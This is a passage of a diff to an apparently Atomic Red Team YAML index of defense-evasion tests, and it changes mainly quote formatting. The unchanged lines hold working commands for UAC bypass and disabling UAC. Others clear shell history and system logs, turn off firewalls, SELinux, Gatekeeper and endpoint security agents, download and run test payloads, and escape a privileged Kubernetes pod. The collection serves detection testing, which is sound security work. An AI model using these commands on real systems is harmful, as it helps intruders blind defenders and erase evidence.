         cleanup_command: 'reg.exe delete hkcu\software\classes\mscfile /f >nul 2>&1
 
-          '
+'
         name: command_prompt
     - name: Bypass UAC using Event Viewer (PowerShell)
       auto_generated_guid: a6ce9acf-842a-4af6-8f79-539be7608e2b
@@ -19792,7 +19792,7 @@ defense-evasion:
         cleanup_command: 'Remove-Item "HKCU:\software\classes\mscfile" -force -Recurse
           -ErrorAction Ignore
 
-          '
+'
         name: powershell
     - name: Bypass UAC using Fodhelper
       auto_generated_guid: 58f641ea-12e3-499a-b684-44dee46bd182
@@ -19814,7 +19814,7 @@ defense-evasion:
         cleanup_command: 'reg.exe delete hkcu\software\classes\ms-settings /f >nul
           2>&1
 
-          '
+'
         name: command_prompt
     - name: Bypass UAC using Fodhelper - PowerShell
       auto_generated_guid: 3f627297-6c38-4e7d-a278-fc2563eaaeaa
@@ -19837,7 +19837,7 @@ defense-evasion:
         cleanup_command: 'Remove-Item "HKCU:\software\classes\ms-settings" -force
           -Recurse -ErrorAction Ignore
 
-          '
+'
         name: powershell
     - name: Bypass UAC using ComputerDefaults (PowerShell)
       auto_generated_guid: 3c51abf2-44bf-42d8-9111-dc96ff66750f
@@ -19860,7 +19860,7 @@ defense-evasion:
         cleanup_command: 'Remove-Item "HKCU:\software\classes\ms-settings" -force
           -Recurse -ErrorAction Ignore
 
-          '
+'
         name: powershell
         elevation_required: true
     - name: Bypass UAC by Mocking Trusted Directories
@@ -19908,7 +19908,7 @@ defense-evasion:
         cleanup_command: 'Remove-Item -Path "HKCU:\Software\Classes\Folder" -Recurse
           -Force -ErrorAction Ignore
 
-          '
+'
         name: powershell
     - name: Disable UAC using reg.exe
       auto_generated_guid: 9e8af564-53ec-407e-aaa8-3cb20c3af7f9
@@ -19921,11 +19921,11 @@ defense-evasion:
         command: 'reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
           /v EnableLUA /t REG_DWORD /d 0 /f
 
-          '
+'
         cleanup_command: 'reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
           /v EnableLUA /t REG_DWORD /d 1 /f
 
-          '
+'
         name: command_prompt
         elevation_required: true
     - name: Bypass UAC using SilentCleanup task
@@ -20030,7 +20030,7 @@ defense-evasion:
       description: 'Adversaries may supply CMSTP.exe with INF files infected with
         malicious commands
 
-        '
+'
       supported_platforms:
       - windows
       input_arguments:
@@ -20042,24 +20042,24 @@ defense-evasion:
       dependencies:
       - description: 'INF file must exist on disk at specified location (#{inf_file_path})
 
-          '
+'
         prereq_command: 'if (Test-Path #{inf_file_path}) {exit 0} else {exit 1}
 
-          '
+'
         get_prereq_command: |
           New-Item -Type Directory (split-path #{inf_file_path}) -ErrorAction ignore | Out-Null
           Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.003/src/T218.003.inf" -OutFile "#{inf_file_path}"
       executor:
         command: 'cmstp.exe /s #{inf_file_path}
 
-          '
+'
         name: command_prompt
     - name: CMSTP Executing UAC Bypass
       auto_generated_guid: 748cb4f6-2fb3-4e97-b7ad-b22635a09ab0
       description: 'Adversaries may invoke cmd.exe (or other malicious commands) by
         embedding them in the RunPreSetupCommandsSection of an INF file
 
-        '
+'
       supported_platforms:
       - windows
       input_arguments:
@@ -20071,17 +20071,17 @@ defense-evasion:
       dependencies:
       - description: 'INF file must exist on disk at specified location (#{inf_file_uac})
 
-          '
+'
         prereq_command: 'if (Test-Path #{inf_file_uac}) {exit 0} else {exit 1}
 
-          '
+'
         get_prereq_command: |
           New-Item -Type Directory (split-path #{inf_file_uac}) -ErrorAction ignore | Out-Null
           Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.003/src/T1218.003_uacbypass.inf" -OutFile "#{inf_file_uac}"
       executor:
         command: 'cmstp.exe /s #{inf_file_uac} /au
 
-          '
+'
         name: command_prompt
   T1574.012:
     technique:
@@ -20192,7 +20192,7 @@ defense-evasion:
       - description: "#{file_name} must be present\n"
         prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1}
 
-          '
+'
         get_prereq_command: |
           New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null
           Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}"
@@ -20237,7 +20237,7 @@ defense-evasion:
       - description: "#{file_name} must be present\n"
         prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1}
 
-          '
+'
         get_prereq_command: |
           New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null
           Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}"
@@ -20275,7 +20275,7 @@ defense-evasion:
       - description: "#{file_name} must be present\n"
         prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1}
 
-          '
+'
         get_prereq_command: |
           New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null
           Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}"
@@ -20359,71 +20359,71 @@ defense-evasion:
       auto_generated_guid: a934276e-2be5-4a36-93fd-98adbb5bd4fc
       description: 'Clears bash history via rm
 
-        '
+'
       supported_platforms:
       - linux
       - macos
       executor:
         command: 'rm ~/.bash_history
 
-          '
+'
         name: sh
     - name: Clear Bash history (echo)
       auto_generated_guid: cbf506a5-dd78-43e5-be7e-a46b7c7a0a11
       description: 'Clears bash history via rm
 
-        '
+'
       supported_platforms:
       - linux
       executor:
         command: 'echo "" > ~/.bash_history
 
-          '
+'
         name: sh
     - name: Clear Bash history (cat dev/null)
       auto_generated_guid: b1251c35-dcd3-4ea1-86da-36d27b54f31f
       description: 'Clears bash history via cat /dev/null
 
-        '
+'
       supported_platforms:
       - linux
       - macos
       executor:
         command: 'cat /dev/null > ~/.bash_history
 
-          '
+'
         name: sh
     - name: Clear Bash history (ln dev/null)
       auto_generated_guid: 23d348f3-cc5c-4ba9-bd0a-ae09069f0914
       description: 'Clears bash history via a symlink to /dev/null
 
-        '
+'
       supported_platforms:
       - linux
       - macos
       executor:
         command: 'ln -sf /dev/null ~/.bash_history
 
-          '
+'
         name: sh
     - name: Clear Bash history (truncate)
       auto_generated_guid: 47966a1d-df4f-4078-af65-db6d9aa20739
       description: 'Clears bash history via truncate
 
-        '
+'
       supported_platforms:
       - linux
       executor:
         command: 'truncate -s0 ~/.bash_history
 
-          '
+'
         name: sh
     - name: Clear history of a bunch of shells
       auto_generated_guid: 7e6721df-5f08-4370-9255-f06d8a77af4c
       description: 'Clears the history of a bunch of different shell types by setting
         the history size to zero
 
-        '
+'
       supported_platforms:
       - linux
       - macos
@@ -20438,7 +20438,7 @@ defense-evasion:
       description: 'Clears the history and disable bash history logging of the current
         shell and future shell sessions
 
-        '
+'
       supported_platforms:
       - linux
       - macos
@@ -20458,7 +20458,7 @@ defense-evasion:
       description: 'Using a space before a command causes the command to not be logged
         in the Bash History file
 
-        '
+'
       supported_platforms:
       - linux
       - macos
@@ -20473,13 +20473,13 @@ defense-evasion:
         keeps the ssh client from catching a proper TTY, which is what usually gets
         logged on lastlog
 
-        '
+'
       supported_platforms:
       - linux
       dependencies:
       - description: 'Install sshpass and create user account used for excuting
 
-          '
+'
         prereq_command: |
           /usr/sbin/useradd testuser1
           echo pwd101! | passwd testuser1 --stdin
@@ -20489,35 +20489,35 @@ defense-evasion:
       executor:
         command: 'sshpass -p ''pwd101!'' ssh testuser1@localhost -T hostname
 
-          '
+'
         cleanup_command: 'userdel -f testuser1
 
-          '
+'
         name: sh
     - name: Prevent Powershell History Logging
       auto_generated_guid: 2f898b81-3e97-4abb-bc3f-a95138988370
       description: 'Prevents Powershell history
 
-        '
+'
       supported_platforms:
       - windows
       executor:
         command: 'Set-PSReadlineOption –HistorySaveStyle SaveNothing
 
-          '
+'
         name: powershell
         cleanup_command: Set-PSReadLineOption -HistorySaveStyle SaveIncrementally
     - name: Clear Powershell History by Deleting History File
       auto_generated_guid: da75ae8d-26d6-4483-b0fe-700e4df4f037
       description: 'Clears Powershell history
 
-        '
+'
       supported_platforms:
       - windows
       executor:
         command: 'Remove-Item (Get-PSReadlineOption).HistorySavePath
 
-          '
+'
         name: powershell
   T1070.002:
     technique:
@@ -20568,7 +20568,7 @@ defense-evasion:
       auto_generated_guid: 989cc1b1-3642-4260-a809-54f9dd559683
       description: 'Delete system and audit logs
 
-        '
+'
       supported_platforms:
       - macos
       - linux
@@ -20584,7 +20584,7 @@ defense-evasion:
         This technique was used by threat actor Rocke during the exploitation of Linux
         web servers.
 
-        '
+'
       supported_platforms:
       - linux
       input_arguments:
@@ -20595,14 +20595,14 @@ defense-evasion:
       executor:
         command: 'echo 0> /var/spool/mail/#{username}
 
-          '
+'
         name: bash
     - name: Overwrite Linux Log
       auto_generated_guid: d304b2dc-90b4-4465-a650-16ddd503f7b5
       description: 'This test overwrites the specified log. This technique was used
         by threat actor Rocke during the exploitation of Linux web servers.
 
-        '
+'
       supported_platforms:
       - linux
       input_arguments:
@@ -20613,7 +20613,7 @@ defense-evasion:
       executor:
         command: 'echo 0> #{log_path}
 
-          '
+'
         name: bash
   T1070.001:
     technique:
@@ -20681,7 +20681,7 @@ defense-evasion:
         System.evtx logs at C:\Windows\System32\winevt\Logs and verify that it is
         now empty.
 
-        '
+'
       supported_platforms:
       - windows
       input_arguments:
@@ -20692,7 +20692,7 @@ defense-evasion:
       executor:
         command: 'wevtutil cl #{log_name}
 
-          '
+'
         name: command_prompt
         elevation_required: true
     - name: Delete System Logs Using Clear-EventLog
@@ -20721,7 +20721,7 @@ defense-evasion:
       dependencies:
       - description: 'Microsoft Word must be installed
 
-          '
+'
         prereq_command: |
           try {
             New-Object -COMObject "Word.Application" | Out-Null
@@ -20731,7 +20731,7 @@ defense-evasion:
         get_prereq_command: 'Write-Host "You will need to install Microsoft Word manually
           to meet this requirement"
 
-          '
+'
       executor:
         command: |
           [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
@@ -21042,10 +21042,10 @@ defense-evasion:
       dependencies:
       - description: 'C# file must exist on disk at specified location (#{input_file})
 
-          '
+'
         prereq_command: 'if (Test-Path #{input_file}) {exit 0} else {exit 1}
 
-          '
+'
         get_prereq_command: |
           New-Item -Type Directory (split-path #{input_file}) -ErrorAction ignore | Out-Null
           Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027.004/src/calc.cs" -OutFile "#{input_file}"
@@ -21053,10 +21053,10 @@ defense-evasion:
         command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /out:#{output_file}
           #{input_file}
 
-          '
+'
         cleanup_command: 'del #{output_file} >nul 2>&1
 
-          '
+'
         name: command_prompt
     - name: Dynamic C# Compile
       auto_generated_guid: 453614d8-3ba6-4147-acc0-7ec4b3e1faef
@@ -21078,18 +21078,18 @@ defense-evasion:
       dependencies:
       - description: 'exe file must exist on disk at specified location (#{input_file})
 
-          '
+'
         prereq_command: 'if (Test-Path #{input_file}) {exit 0} else {exit 1}
 
-          '
+'
         get_prereq_command: 'Invoke-WebRequest https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027.004/bin/T1027.004_DynamicCompile.exe
           -OutFile #{input_file}
 
-          '
+'
       executor:
         command: 'Invoke-Expression #{input_file}
 
-          '
+'
         name: powershell
   T1218.001:
     technique:
@@ -21169,17 +21169,17 @@ defense-evasion:
       dependencies:
       - description: 'The payload must exist on disk at specified location (#{local_chm_file})
 
-          '
+'
         prereq_command: 'if (Test-Path #{local_chm_file}) {exit 0} else {exit 1}
 
-          '
+'
         get_prereq_command: |
           New-Item -Type Directory (split-path #{local_chm_file}) -ErrorAction ignore | Out-Null
           Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.001/src/T1218.001.chm" -OutFile "#{local_chm_file}"
       executor:
         command: 'hh.exe #{local_chm_file}
 
-          '
+'
         name: command_prompt
     - name: Compiled HTML Help Remote Payload
       auto_generated_guid: 0f8af516-9818-4172-922b-42986ef1e81d
@@ -21196,7 +21196,7 @@ defense-evasion:
       executor:
         command: 'hh.exe #{remote_chm_file}
 
-          '
+'
         name: command_prompt
     - name: Invoke CHM with default Shortcut Command Execution
       auto_generated_guid: 29d6f0d7-be63-4482-8827-ea77126c1ef7
@@ -21222,7 +21222,7 @@ defense-evasion:
         get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
           -Force
 
-          '
+'
       executor:
         command: 'Invoke-ATHCompiledHelp -HHFilePath #{hh_file_path} -CHMFilePath
           #{chm_file_path}'
@@ -21255,7 +21255,7 @@ defense-evasion:
         get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
           -Force
 
-          '
+'
       executor:
         command: 'Invoke-ATHCompiledHelp -InfoTechStorageHandler #{infotech_storage_handler}
           -HHFilePath #{hh_file_path} -CHMFilePath #{chm_file_path}'
@@ -21280,7 +21280,7 @@ defense-evasion:
         get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
           -Force
 
-          '
+'
       executor:
         command: 'Invoke-ATHCompiledHelp -SimulateUserDoubleClick -CHMFilePath #{chm_file_path}'
         name: powershell
@@ -21321,7 +21321,7 @@ defense-evasion:
         get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
           -Force
 
-          '
+'
       executor:
         command: 'Invoke-ATHCompiledHelp -ScriptEngine #{script_engine} -InfoTechStorageHandler
           #{infotech_storage_handler} -TopicExtension #{topic_extension} -HHFilePath
@@ -21360,7 +21360,7 @@ defense-evasion:
         get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
           -Force
 
-          '
+'
       executor:
         command: 'Invoke-ATHCompiledHelp -ExecuteShortcutCommand -InfoTechStorageHandler
           #{infotech_storage_handler} -TopicExtension #{topic_extension} -HHFilePath
@@ -21513,17 +21513,17 @@ defense-evasion:
       dependencies:
       - description: 'Cpl file must exist on disk at specified location (#{cpl_file_path})
 
-          '
+'
         prereq_command: 'if (Test-Path #{cpl_file_path}) {exit 0} else {exit 1}
 
-          '
+'
         get_prereq_command: |
           New-Item -Type Directory (split-path #{cpl_file_path}) -ErrorAction ignore | Out-Null
           Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.002/bin/calc.cpl" -OutFile "#{cpl_file_path}"
       executor:
         command: 'control.exe #{cpl_file_path}
 
-          '
+'
         name: command_prompt
   T1578.002:
     technique:
@@ -21854,10 +21854,10 @@ defense-evasion:
       dependencies:
       - description: 'Gup.exe binary must exist on disk at specified location (#{gup_executable})
 
-          '
+'
         prereq_command: 'if (Test-Path #{gup_executable}) {exit 0} else {exit 1}
 
-          '
+'
         get_prereq_command: |
           New-Item -Type Directory (split-path #{gup_executable}) -ErrorAction ignore | Out-Null
           Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/bin/GUP.exe?raw=true" -OutFile "#{gup_executable}"
@@ -21865,7 +21865,7 @@ defense-evasion:
         command: "#{gup_executable}\n"
         cleanup_command: 'taskkill /F /IM #{process_name} >nul 2>&1
 
-          '
+'
         name: command_prompt
   T1078.001:
     technique:
@@ -21977,16 +21977,16 @@ defense-evasion:
       description: 'The Adversaries can activate the default Guest user. The guest
         account is inactivated by default
 
-        '
+'
       supported_platforms:
       - windows
       executor:
         command: 'net user guest /active:yes
 
-          '
+'
         cleanup_command: 'net user guest /active:no
 
-          '
+'
         name: command_prompt
         elevation_required: true
   T1578.003:
@@ -22125,7 +22125,7 @@ defense-evasion:
       description: 'Rename certutil and decode a file. This is in reference to latest
         research by FireEye [here](https://www.fireeye.com/blog/threat-research/2018/09/apt10-targeting-japanese-corporations-using-updated-ttps.html)
 
-        '
+'
       supported_platforms:
       - windows
       input_arguments:
@@ -22148,7 +22148,7 @@ defense-evasion:
       description: 'Use Python to decode a base64-encoded text string and echo it
         to the console
 
-        '
+'
       supported_platforms:
       - linux
       - macos
@@ -22164,13 +22164,13 @@ defense-evasion:
       dependencies:
       - description: 'Python must be present
 
-          '
+'
         prereq_command: 'which python3
 
-          '
+'
         get_prereq_command: 'echo "Please install Python 3"
 
-          '
+'
       executor:
         name: sh
         elevation_required: false
@@ -22187,7 +22187,7 @@ defense-evasion:
       description: 'Use Perl to decode a base64-encoded text string and echo it to
         the console
 
-        '
+'
       supported_platforms:
       - linux
       - macos
@@ -22203,13 +22203,13 @@ defense-evasion:
       dependencies:
       - description: 'Perl must be present
 
-          '
+'
         prereq_command: 'which perl
 
-          '
+'
         get_prereq_command: 'echo "Please install Perl"
 
-          '
+'
       executor:
         name: sh
         elevation_required: false
@@ -22223,7 +22223,7 @@ defense-evasion:
       description: 'Use common shell utilities to decode a base64-encoded text string
         and echo it to the console
 
-        '
+'
       supported_platforms:
       - linux
       - macos
@@ -22254,7 +22254,7 @@ defense-evasion:
       description: 'Use common shell utilities to decode a hex-encoded text string
         and echo it to the console
 
-        '
+'
       supported_platforms:
       - linux
       - macos
@@ -22270,13 +22270,13 @@ defense-evasion:
       dependencies:
       - description: 'xxd must be present
 
-          '
+'
         prereq_command: 'which xxd
 
-          '
+'
         get_prereq_command: 'echo "Please install xxd"
 
-          '
+'
       executor:
         name: sh
         elevation_required: false
@@ -22375,24 +22375,24 @@ defense-evasion:
       - description: Verify docker is installed.
         prereq_command: 'which docker
 
-          '
+'
         get_prereq_command: 'if [ "" == "`which docker`" ]; then echo "Docker Not
           Found"; if [ -n "`which apt-get`" ]; then sudo apt-get -y install docker
           ; elif [ -n "`which yum`" ]; then sudo yum -y install docker ; fi ; else
           echo "Docker installed"; fi
 
-          '
+'
       - description: Verify docker service is running.
         prereq_command: 'sudo systemctl status docker
 
-          '
+'
         get_prereq_command: 'sudo systemctl start docker
 
-          '
+'
       - description: Verify kind is in the path.
         prereq_command: 'which kind
 
-          '
+'
         get_prereq_command: |
           curl -Lo ./kind https://kind.sigs.k8s.io/dl/v0.10.0/kind-linux-amd64
           chmod +x ./kind
@@ -22400,14 +22400,14 @@ defense-evasion:
       - description: Verify kind-atomic-cluster is created
         prereq_command: 'sudo kind get clusters
 
-          '
+'
         get_prereq_command: 'sudo kind create cluster --name atomic-cluster
 
-          '
+'
       - description: Verify kubectl is in path
         prereq_command: 'which kubectl
 
-          '
+'
         get_prereq_command: |
           curl -LO "https://dl.k8s.io/release/$(curl -L -s https://dl.k8s.io/release/stable.txt)/bin/linux/amd64/kubectl"
           chmod +x ./kubectl
@@ -22417,11 +22417,11 @@ defense-evasion:
           -ti --rm --image alpine --overrides ''{"spec":{"hostPID": true, "containers":[{"name":"1","image":"alpine","command":["nsenter","--mount=/proc/1/ns/mnt","--","/bin/bash"],"stdin":
           true,"tty":true,"securityContext":{"privileged":true}}]}}''
 
-          '
+'
         name: sh
         cleanup_command: 'kubectl --context kind-atomic-cluster delete pod atomic-escape-pod
 
-          '
+'
   T1006:
     technique:
       id: attack-pattern--0c8ab3eb-df48-4b9c-ace7-beacaac81cc5
@@ -22663,7 +22663,7 @@ defense-evasion:
         command: 'C:\Windows\System32\inetsrv\appcmd.exe set config "#{website_name}"
           /section:httplogging /dontLog:true
 
-          '
+'
         cleanup_command: |
           if(Test-Path "C:\Windows\System32\inetsrv\appcmd.exe"){
             C:\Windows\System32\inetsrv\appcmd.exe set config "#{website_name}" /section:httplogging /dontLog:false *>$null
@@ -22822,10 +22822,10 @@ defense-evasion:
       executor:
         command: 'netsh advfirewall set currentprofile state off
 
-          '
+'
         cleanup_command: 'netsh advfirewall set currentprofile state on >nul 2>&1
 
-          '
+'
         name: command_prompt
     - name: Disable Microsoft Defender Firewall via Registry
       auto_generated_guid: afedc8c4-038c-4d82-b3e5-623a95f8a612
@@ -22838,11 +22838,11 @@ defense-evasion:
         command: 'reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile"
           /v "EnableFirewall" /t REG_DWORD /d 0 /f
 
-          '
+'
         cleanup_command: 'reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile"
           /v "EnableFirewall" /t REG_DWORD /d 1 /f
 
-          '
+'
         name: command_prompt
     - name: Allow SMB and RDP on Microsoft Defender Firewall
       auto_generated_guid: d9841bf8-f161-4c73-81e9-fd773a5ff8c1
@@ -22857,7 +22857,7 @@ defense-evasion:
           netsh advfirewall firewall set rule group="file and printer sharing" new enable=Yes
         cleanup_command: 'netsh advfirewall reset >nul 2>&1
 
-          '
+'
         name: command_prompt
     - name: Opening ports for proxy - HARDRAIN
       auto_generated_guid: 15e57006-79dd-46df-9bf9-31bc24fb5a80
@@ -22916,27 +22916,27 @@ defense-evasion:
       auto_generated_guid: fe135572-edcd-49a2-afe6-1d39521c5a9a
       description: 'Stop the Uncomplicated Firewall (UFW) if installed.
 
-        '
+'
       supported_platforms:
       - linux
       dependency_executor_name: sh
       dependencies:
       - description: 'Check if ufw is installed on the machine.
 
-          '
+'
         prereq_command: "if [ ! -x \"$(command -v ufw)\" ]; then echo -e \"\\n*****
           ufw NOT installed *****\\n\"; exit 1; fi\nif echo \"$(ufw status)\" |grep
           -q \"inactive\"; then echo -e \"\\n***** ufw inactive *****\\n\"; exit 1;
           fi \n"
         get_prereq_command: 'echo ""
 
-          '
+'
       executor:
         name: sh
         elevation_required: true
         command: 'ufw disable
 
-          '
+'
         cleanup_command: |
           ufw enable
           ufw status verbose
@@ -22950,7 +22950,7 @@ defense-evasion:
       dependencies:
       - description: 'Check if systemctl and ufw is installed on the machine.
 
-          '
+'
         prereq_command: "if [ ! -x \"$(command -v systemctl)\" ]; then echo -e \"\\n*****
           systemctl NOT installed *****\\n\"; exit 1; fi\nif [ ! -x \"$(command -v
           ufw)\" ]; then echo -e \"\\n***** ufw NOT installed *****\\n\"; exit 1;
@@ -22958,13 +22958,13 @@ defense-evasion:
           ufw inactive *****\\n\"; exit 1; fi \n"
         get_prereq_command: 'echo ""
 
-          '
+'
       executor:
         name: sh
         elevation_required: true
         command: 'systemctl stop ufw
 
-          '
+'
         cleanup_command: |
           systemctl start ufw
           systemctl status ufw
@@ -22977,20 +22977,20 @@ defense-evasion:
       dependencies:
       - description: 'Check if ufw is installed on the machine and enabled.
 
-          '
+'
         prereq_command: "if [ ! -x \"$(command -v ufw)\" ]; then echo -e \"\\n*****
           ufw NOT installed *****\\n\"; exit 1; fi\nif echo \"$(ufw status)\" |grep
           -q \"inactive\"; then echo -e \"\\n***** ufw inactive *****\\n\"; exit 1;
           fi \n"
         get_prereq_command: 'echo ""
 
-          '
+'
       executor:
         name: sh
         elevation_required: true
         command: 'ufw logging off
 
-          '
+'
         cleanup_command: |
           ufw logging low
           ufw status verbose
@@ -23004,14 +23004,14 @@ defense-evasion:
       dependencies:
       - description: 'Check if ufw is installed on the machine and enabled.
 
-          '
+'
         prereq_command: "if [ ! -x \"$(command -v ufw)\" ]; then echo -e \"\\n*****
           ufw NOT installed *****\\n\"; exit 1; fi\nif echo \"$(ufw status)\" |grep
           -q \"inactive\"; then echo -e \"\\n***** ufw inactive *****\\n\"; exit 1;
           fi \n"
         get_prereq_command: 'echo ""
 
-          '
+'
       executor:
         name: sh
         elevation_required: true
@@ -23025,21 +23025,21 @@ defense-evasion:
       auto_generated_guid: beaf815a-c883-4194-97e9-fdbbb2bbdd7c
       description: 'Edit the Uncomplicated Firewall (UFW) rules file /etc/ufw/user.rules.
 
-        '
+'
       supported_platforms:
       - linux
       dependency_executor_name: sh
       dependencies:
       - description: 'Check if /etc/ufw/user.rules exists.
 
-          '
+'
         prereq_command: 'if [ ! -f "/etc/ufw/user.rules" ]; then echo -e "\n*****
           ufw NOT installed *****\n"; exit 1; fi
 
-          '
+'
         get_prereq_command: 'echo ""
 
-          '
+'
       executor:
         name: sh
         elevation_required: true
@@ -23048,7 +23048,7 @@ defense-evasion:
           grep "# THIS IS A COMMENT" /etc/ufw/user.rules
         cleanup_command: 'sed -i ''s/# THIS IS A COMMENT//g'' /etc/ufw/user.rules
 
-          '
+'
     - name: Edit UFW firewall ufw.conf file
       auto_generated_guid: c1d8c4eb-88da-4927-ae97-c7c25893803b
       description: "Edit the Uncomplicated Firewall (UFW) configuration file /etc/ufw/ufw.conf
@@ -23059,14 +23059,14 @@ defense-evasion:
       dependencies:
       - description: 'Check if /etc/ufw/ufw.conf exists.
 
-          '
+'
         prereq_command: 'if [ ! -f "/etc/ufw/ufw.conf" ]; then echo -e "\n***** ufw
           NOT installed *****\n"; exit 1; fi
 
-          '
+'
         get_prereq_command: 'echo ""
 
-          '
+'
       executor:
         name: sh
         elevation_required: true
@@ -23086,14 +23086,14 @@ defense-evasion:
       dependencies:
       - description: 'Check if /etc/ufw/sysctl.conf exists.
 
-          '
+'
         prereq_command: 'if [ ! -f "/etc/ufw/sysctl.conf" ]; then echo -e "\n*****
           ufw NOT installed *****\n"; exit 1; fi
 
-          '
+'
         get_prereq_command: 'echo ""
 
-          '
+'
       executor:
         name: sh
         elevation_required: true
@@ -23113,14 +23113,14 @@ defense-evasion:
       dependencies:
       - description: 'Check if /etc/default/ufw exists.
 
-          '
+'
         prereq_command: 'if [ ! -f "/etc/default/ufw" ]; then echo -e "\n***** ufw
           NOT installed *****\n"; exit 1; fi
 
-          '
+'
         get_prereq_command: 'echo ""
 
-          '
+'
       executor:
         name: sh
         elevation_required: true
@@ -23129,7 +23129,7 @@ defense-evasion:
           grep "# THIS IS A COMMENT" /etc/default/ufw
         cleanup_command: 'sed -i ''s/# THIS IS A COMMENT//g'' /etc/default/ufw
 
-          '
+'
     - name: Tail the UFW firewall log file
       auto_generated_guid: 419cca0c-fa52-4572-b0d7-bc7c6f388a27
       description: "Print  the last 10 lines of the Uncomplicated Firewall (UFW) log
@@ -23140,20 +23140,20 @@ defense-evasion:
       dependencies:
       - description: 'Check if /var/log/ufw.log exists.
 
-          '
+'
         prereq_command: 'if [ ! -f "/var/log/ufw.log" ]; then echo -e "\n***** ufw
           NOT logging *****\n"; exit 1; fi
 
-          '
+'
         get_prereq_command: 'echo ""
 
-          '
+'
       executor:
         name: sh
         elevation_required: true
         command: 'tail /var/log/ufw.log
 
-          '
+'
         cleanup_command: ''
   T1562.001:
     technique:
@@ -23218,7 +23218,7 @@ defense-evasion:
       auto_generated_guid: 4ce786f8-e601-44b5-bfae-9ebb15a7d1c8
       description: 'Disables syslog collection
 
-        '
+'
       supported_platforms:
       - linux
       input_arguments:
@@ -23245,11 +23245,11 @@ defense-evasion:
       dependencies:
       - description: 'Package with rsyslog must be on system
 
-          '
+'
         prereq_command: 'if #{package_checker} > /dev/null; then exit 0; else exit
           1; fi
 
-          '
+'
         get_prereq_command: "sudo #{package_installer} \n"
       executor:
         command: "#{flavor_command}\n"
@@ -23260,7 +23260,7 @@ defense-evasion:
       auto_generated_guid: ae8943f7-0f8d-44de-962d-fbc2e2f03eb8
       description: 'Disable the Cb Response service
 
-        '
+'
       supported_platforms:
       - linux
       executor:
@@ -23278,23 +23278,23 @@ defense-evasion:
       auto_generated_guid: fc225f36-9279-4c39-b3f9-5141ab74f8d8
       description: 'Disables SELinux enforcement
 
-        '
+'
       supported_platforms:
       - linux
       executor:
         command: 'setenforce 0
 
-          '
+'
         cleanup_command: 'setenforce 1
 
-          '
+'
         name: sh
         elevation_required: true
     - name: Stop Crowdstrike Falcon on Linux
       auto_generated_guid: 828a1278-81cc-4802-96ab-188bf29ca77d
       description: 'Stop and disable Crowdstrike Falcon on Linux
 
-        '
+'
       supported_platforms:
       - linux
       executor:
@@ -23310,7 +23310,7 @@ defense-evasion:
       auto_generated_guid: 8fba7766-2d11-4b4a-979a-1e3d9cc9a88c
       description: 'Disables Carbon Black Response
 
-        '
+'
       supported_platforms:
       - macos
       executor:
@@ -23326,48 +23326,48 @@ defense-evasion:
       auto_generated_guid: 62155dd8-bb3d-4f32-b31c-6532ff3ac6a3
       description: 'Disables LittleSnitch
 
-        '
+'
       supported_platforms:
       - macos
       executor:
         command: 'sudo launchctl unload /Library/LaunchDaemons/at.obdev.littlesnitchd.plist
 
-          '
+'
         cleanup_command: 'sudo launchctl load -w /Library/LaunchDaemons/at.obdev.littlesnitchd.plist
 
-          '
+'
         name: sh
         elevation_required: true
     - name: Disable OpenDNS Umbrella
       auto_generated_guid: 07f43b33-1e15-4e99-be70-bc094157c849
       description: 'Disables OpenDNS Umbrella
 
-        '
+'
       supported_platforms:
       - macos
       executor:
         command: 'sudo launchctl unload /Library/LaunchDaemons/com.opendns.osx.RoamingClientConfigUpdater.plist
 
-          '
+'
         cleanup_command: 'sudo launchctl load -w /Library/LaunchDaemons/com.opendns.osx.RoamingClientConfigUpdater.plist
 
-          '
+'
         name: sh
         elevation_required: true
     - name: Disable macOS Gatekeeper
       auto_generated_guid: 2a821573-fb3f-4e71-92c3-daac7432f053
       description: 'Disables macOS Gatekeeper
 
-        '
+'
       supported_platforms:
       - macos
       executor:
         command: 'sudo spctl --master-disable
 
-          '
+'
         cleanup_command: 'sudo spctl --master-enable
 
-          '
+'
         name: sh
         elevation_required: true
     - name: Stop and unload Crowdstrike Falcon on macOS
@@ -23375,7 +23375,7 @@ defense-evasion:
       description: 'Stop and unload Crowdstrike Falcon daemons falcond and userdaemon
         on macOS
 
-        '
+'
       supported_platforms:
       - macos
       input_arguments:
@@ -23413,40 +23413,40 @@ defense-evasion:
       dependencies:
       - description: 'Sysmon must be downloaded
 
-          '
+'
